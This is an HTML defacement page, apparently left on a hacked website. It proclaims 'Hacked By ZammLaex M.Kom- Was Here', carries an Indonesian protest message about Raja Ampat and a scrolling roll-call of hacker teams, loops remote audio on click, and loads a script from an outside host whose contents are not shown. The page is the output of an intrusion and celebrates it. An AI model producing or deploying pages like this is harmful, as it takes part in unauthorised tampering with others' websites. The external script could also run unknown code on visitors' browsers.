<!DOCTYPE html>
<html lang="en">
  <head>
    <link rel="icon" href="https://raw.githubusercontent.com/kellz-stack/in/refs/heads/main/IMG_20250218_125001_087.jpg" type="image/x-icon" />
    <meta name="keywords" content="Hacked By ZammLaex M.Kom-" />
    <meta name="description" content="Hacked By ZammLaex M.Kom-" />
    <meta name="author" content="Hacked By ZammLaex M.Kom-" />
    <meta name="theme-color" content="#343a40" />
    <meta property="og:title" content="Hacked By ZammLaex M.Kom-" />
    <meta property="og:description" content="Hacked By ZammLaex M.Kom-" />
    <title> Hacked By ZammLaex M.Kom- </title>
    <link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css" />
    <style>
      body {
        color: #ffffff;
        font-family: "Kelly Slab", sans-serif;
        height: 100vh;
        margin: 0;
        padding: 0;
        background-color: black;
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        text-align: center;
      }
      img {
        max-width: 90vw;
        max-height: 50vh;
      }
      .content {
        max-width: 90%;
      }
      audio {
        margin-top: 10px;
      }
    </style>
  </head>
  <body>
    <div class="content">
      <img src="https://files.catbox.moe/4yv5m5.jpg" alt="Hacked By ZammLaex M.Kom-" />
      <h1 style="color: red; font-size: 40px">[+] Hacked By ZammLaex M.Kom- Was Here!! [+]</h1>
      <div style="font-size: 20px; color: white; line-height: 1.5;">
Raja Ampat bukan milik segelintir orang, tapi warisan alam untuk dunia. Hentikan perusakan, hentikan eksploitasi! SIMPAN RAJA AMPAT sekarang juga.</br>
        #okegasokegasindonesiacemas #generasicemas #pemerintahmentalkoruptor #RIPefisiensi #saverajaampat #papuabukantanahkosong
    </div>
    
    
        <marquee direction="left" scrollamount="6" width="100%" style="width: 87%">
          <font color="red" font-size="20px"> We Are  SUMATRA UTARA CYBER TEAM | SABUNBOLONGCYBERCLUB | ANJINGWARIOR TEAM|RendySec1337 | fitwilliamx1337| ./Marioganz | KnowXploit98 | NucleuX | ./EvilExploit | ./GregCyber | RidXploit | BonsCodes | ClaratZ | ./Doom3r | GMFR444X | Pyscodes | SLX_94 | ZammSec01 | GanjarXploit1337 |</marquee
        >
      </p>
      <script>
        document.addEventListener("click", function playAudio() {
          var audio = new Audio("https://k.top4top.io/m_33314q0hs1.mp3");
          audio.loop = true;
          audio.play().catch((error) => console.log("Autoplay gagal:", error));
          
          // Menghapus event listener setelah dipicu sekali agar tidak mengulang setiap klik
          document.removeEventListener("click", playAudio);
        });
      </script>
      
    </div>
    <script type="text/javascript" src="https://drvee07.github.io/loc/drv.js"></script>
  </body>
</html>
